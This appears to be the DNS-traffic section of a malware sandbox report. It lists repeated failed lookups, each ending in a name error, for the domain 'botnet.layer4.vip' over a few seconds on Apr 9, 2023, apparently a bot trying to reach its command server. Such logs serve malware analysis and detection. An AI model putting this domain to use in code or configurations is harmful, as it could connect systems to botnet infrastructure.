                                  Apr 9, 2023 03:30:36.502945900 CEST8.8.8.8192.168.2.230x7a09Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.518871069 CEST8.8.8.8192.168.2.230x7a09Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.534873009 CEST8.8.8.8192.168.2.230x743bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.550468922 CEST8.8.8.8192.168.2.230x743bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.566194057 CEST8.8.8.8192.168.2.230x743bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.581625938 CEST8.8.8.8192.168.2.230x743bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.597592115 CEST8.8.8.8192.168.2.230x743bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.621999979 CEST8.8.8.8192.168.2.230xd456Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.637876987 CEST8.8.8.8192.168.2.230xd456Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.662745953 CEST8.8.8.8192.168.2.230xd456Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.678920984 CEST8.8.8.8192.168.2.230xd456Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.694626093 CEST8.8.8.8192.168.2.230xd456Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.719086885 CEST8.8.8.8192.168.2.230x293aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.734906912 CEST8.8.8.8192.168.2.230x293aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.759171009 CEST8.8.8.8192.168.2.230x293aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.775268078 CEST8.8.8.8192.168.2.230x293aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.791224957 CEST8.8.8.8192.168.2.230x293aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.807487965 CEST8.8.8.8192.168.2.230xf538Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.823072910 CEST8.8.8.8192.168.2.230xf538Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.847580910 CEST8.8.8.8192.168.2.230xf538Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.872065067 CEST8.8.8.8192.168.2.230xf538Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.896584034 CEST8.8.8.8192.168.2.230xf538Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.912698030 CEST8.8.8.8192.168.2.230xd8b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.928411961 CEST8.8.8.8192.168.2.230xd8b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.952668905 CEST8.8.8.8192.168.2.230xd8b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.968544006 CEST8.8.8.8192.168.2.230xd8b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:36.993233919 CEST8.8.8.8192.168.2.230xd8b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.009239912 CEST8.8.8.8192.168.2.230x7f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.024951935 CEST8.8.8.8192.168.2.230x7f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.049478054 CEST8.8.8.8192.168.2.230x7f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.073550940 CEST8.8.8.8192.168.2.230x7f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.099076033 CEST8.8.8.8192.168.2.230x7f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.114842892 CEST8.8.8.8192.168.2.230x97e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.130960941 CEST8.8.8.8192.168.2.230x97e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.155455112 CEST8.8.8.8192.168.2.230x97e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.179836988 CEST8.8.8.8192.168.2.230x97e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.205529928 CEST8.8.8.8192.168.2.230x97e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.232054949 CEST8.8.8.8192.168.2.230xc80aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.247764111 CEST8.8.8.8192.168.2.230xc80aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.272084951 CEST8.8.8.8192.168.2.230xc80aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.296591997 CEST8.8.8.8192.168.2.230xc80aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.312134981 CEST8.8.8.8192.168.2.230xc80aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.327982903 CEST8.8.8.8192.168.2.230xb0f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.352292061 CEST8.8.8.8192.168.2.230xb0f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.376848936 CEST8.8.8.8192.168.2.230xb0f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.394633055 CEST8.8.8.8192.168.2.230xb0f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.410630941 CEST8.8.8.8192.168.2.230xb0f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.434942961 CEST8.8.8.8192.168.2.230x4591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.459207058 CEST8.8.8.8192.168.2.230x4591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.483918905 CEST8.8.8.8192.168.2.230x4591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.499871969 CEST8.8.8.8192.168.2.230x4591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.526078939 CEST8.8.8.8192.168.2.230x4591Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.542360067 CEST8.8.8.8192.168.2.230xef20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.557981968 CEST8.8.8.8192.168.2.230xef20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.573978901 CEST8.8.8.8192.168.2.230xef20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.598603964 CEST8.8.8.8192.168.2.230xef20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.614321947 CEST8.8.8.8192.168.2.230xef20Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.638956070 CEST8.8.8.8192.168.2.230xa299Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.663228035 CEST8.8.8.8192.168.2.230xa299Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.678877115 CEST8.8.8.8192.168.2.230xa299Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.694951057 CEST8.8.8.8192.168.2.230xa299Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.736893892 CEST8.8.8.8192.168.2.230xa299Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.752991915 CEST8.8.8.8192.168.2.230x6b62Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.777580023 CEST8.8.8.8192.168.2.230x6b62Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.802148104 CEST8.8.8.8192.168.2.230x6b62Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.826493979 CEST8.8.8.8192.168.2.230x6b62Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.842190027 CEST8.8.8.8192.168.2.230x6b62Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.857913971 CEST8.8.8.8192.168.2.230x7bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.882720947 CEST8.8.8.8192.168.2.230x7bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.898302078 CEST8.8.8.8192.168.2.230x7bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.913898945 CEST8.8.8.8192.168.2.230x7bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.938036919 CEST8.8.8.8192.168.2.230x7bfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.962524891 CEST8.8.8.8192.168.2.230x7366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:37.979381084 CEST8.8.8.8192.168.2.230x7366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.003763914 CEST8.8.8.8192.168.2.230x7366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.028460026 CEST8.8.8.8192.168.2.230x7366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.052694082 CEST8.8.8.8192.168.2.230x7366Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.068855047 CEST8.8.8.8192.168.2.230xab8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.093446970 CEST8.8.8.8192.168.2.230xab8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.109144926 CEST8.8.8.8192.168.2.230xab8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.133559942 CEST8.8.8.8192.168.2.230xab8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.149233103 CEST8.8.8.8192.168.2.230xab8dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.165221930 CEST8.8.8.8192.168.2.230x4522Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.181154966 CEST8.8.8.8192.168.2.230x4522Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.205395937 CEST8.8.8.8192.168.2.230x4522Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.221477985 CEST8.8.8.8192.168.2.230x4522Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.246763945 CEST8.8.8.8192.168.2.230x4522Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.272736073 CEST8.8.8.8192.168.2.230x1ebbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.298327923 CEST8.8.8.8192.168.2.230x1ebbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.325309992 CEST8.8.8.8192.168.2.230x1ebbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.342664003 CEST8.8.8.8192.168.2.230x1ebbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.368413925 CEST8.8.8.8192.168.2.230x1ebbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.385579109 CEST8.8.8.8192.168.2.230x530bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.411259890 CEST8.8.8.8192.168.2.230x530bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.428431034 CEST8.8.8.8192.168.2.230x530bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.447408915 CEST8.8.8.8192.168.2.230x530bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.473432064 CEST8.8.8.8192.168.2.230x530bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.498235941 CEST8.8.8.8192.168.2.230x7deaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.524039030 CEST8.8.8.8192.168.2.230x7deaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.541395903 CEST8.8.8.8192.168.2.230x7deaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.558700085 CEST8.8.8.8192.168.2.230x7deaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.583408117 CEST8.8.8.8192.168.2.230x7deaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.607918978 CEST8.8.8.8192.168.2.230xc10eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.632273912 CEST8.8.8.8192.168.2.230xc10eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.647885084 CEST8.8.8.8192.168.2.230xc10eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.663623095 CEST8.8.8.8192.168.2.230xc10eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.687791109 CEST8.8.8.8192.168.2.230xc10eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.712456942 CEST8.8.8.8192.168.2.230x176eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.728138924 CEST8.8.8.8192.168.2.230x176eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.752758980 CEST8.8.8.8192.168.2.230x176eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.777102947 CEST8.8.8.8192.168.2.230x176eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.801768064 CEST8.8.8.8192.168.2.230x176eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.817820072 CEST8.8.8.8192.168.2.230x296Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.833619118 CEST8.8.8.8192.168.2.230x296Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.858088017 CEST8.8.8.8192.168.2.230x296Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.882184982 CEST8.8.8.8192.168.2.230x296Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.897599936 CEST8.8.8.8192.168.2.230x296Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.921833038 CEST8.8.8.8192.168.2.230x723dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.937458992 CEST8.8.8.8192.168.2.230x723dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.953118086 CEST8.8.8.8192.168.2.230x723dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.977535009 CEST8.8.8.8192.168.2.230x723dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:38.993797064 CEST8.8.8.8192.168.2.230x723dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.010149002 CEST8.8.8.8192.168.2.230x2056Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.026551008 CEST8.8.8.8192.168.2.230x2056Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.051233053 CEST8.8.8.8192.168.2.230x2056Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.066792965 CEST8.8.8.8192.168.2.230x2056Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.090853930 CEST8.8.8.8192.168.2.230x2056Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.106826067 CEST8.8.8.8192.168.2.230x952Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.122847080 CEST8.8.8.8192.168.2.230x952Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.138845921 CEST8.8.8.8192.168.2.230x952Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.154576063 CEST8.8.8.8192.168.2.230x952Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.178648949 CEST8.8.8.8192.168.2.230x952Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.204216957 CEST8.8.8.8192.168.2.230xb3dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.220278978 CEST8.8.8.8192.168.2.230xb3dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.244735003 CEST8.8.8.8192.168.2.230xb3dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.269877911 CEST8.8.8.8192.168.2.230xb3dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.286482096 CEST8.8.8.8192.168.2.230xb3dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.302319050 CEST8.8.8.8192.168.2.230xdc45Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.318006992 CEST8.8.8.8192.168.2.230xdc45Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.342236996 CEST8.8.8.8192.168.2.230xdc45Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.358503103 CEST8.8.8.8192.168.2.230xdc45Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.375241041 CEST8.8.8.8192.168.2.230xdc45Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.391349077 CEST8.8.8.8192.168.2.230x3e39Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.415811062 CEST8.8.8.8192.168.2.230x3e39Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.431724072 CEST8.8.8.8192.168.2.230x3e39Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.456974983 CEST8.8.8.8192.168.2.230x3e39Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.473102093 CEST8.8.8.8192.168.2.230x3e39Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.489284039 CEST8.8.8.8192.168.2.230x9825Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.513838053 CEST8.8.8.8192.168.2.230x9825Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.538470984 CEST8.8.8.8192.168.2.230x9825Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.554613113 CEST8.8.8.8192.168.2.230x9825Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.571408987 CEST8.8.8.8192.168.2.230x9825Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.588016033 CEST8.8.8.8192.168.2.230x51d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.605853081 CEST8.8.8.8192.168.2.230x51d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.630191088 CEST8.8.8.8192.168.2.230x51d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.646505117 CEST8.8.8.8192.168.2.230x51d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.662247896 CEST8.8.8.8192.168.2.230x51d1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.678769112 CEST8.8.8.8192.168.2.230x2197Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.703891993 CEST8.8.8.8192.168.2.230x2197Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.726140976 CEST8.8.8.8192.168.2.230x2197Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.750662088 CEST8.8.8.8192.168.2.230x2197Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.775197983 CEST8.8.8.8192.168.2.230x2197Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.803252935 CEST8.8.8.8192.168.2.230x2fffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.827893019 CEST8.8.8.8192.168.2.230x2fffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.843616009 CEST8.8.8.8192.168.2.230x2fffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.861416101 CEST8.8.8.8192.168.2.230x2fffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.885602951 CEST8.8.8.8192.168.2.230x2fffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.901906013 CEST8.8.8.8192.168.2.230x558eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.926623106 CEST8.8.8.8192.168.2.230x558eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.942861080 CEST8.8.8.8192.168.2.230x558eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.967549086 CEST8.8.8.8192.168.2.230x558eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.983901024 CEST8.8.8.8192.168.2.230x558eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:39.999594927 CEST8.8.8.8192.168.2.230x8b69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.015485048 CEST8.8.8.8192.168.2.230x8b69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.039602041 CEST8.8.8.8192.168.2.230x8b69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.064232111 CEST8.8.8.8192.168.2.230x8b69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.079802990 CEST8.8.8.8192.168.2.230x8b69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.104610920 CEST8.8.8.8192.168.2.230x84f2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.128684044 CEST8.8.8.8192.168.2.230x84f2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.153213024 CEST8.8.8.8192.168.2.230x84f2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.168817043 CEST8.8.8.8192.168.2.230x84f2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.193526983 CEST8.8.8.8192.168.2.230x84f2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.209331989 CEST8.8.8.8192.168.2.230x34fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.225406885 CEST8.8.8.8192.168.2.230x34fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.241097927 CEST8.8.8.8192.168.2.230x34fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.265503883 CEST8.8.8.8192.168.2.230x34fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:40.281013012 CEST8.8.8.8192.168.2.230x34fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
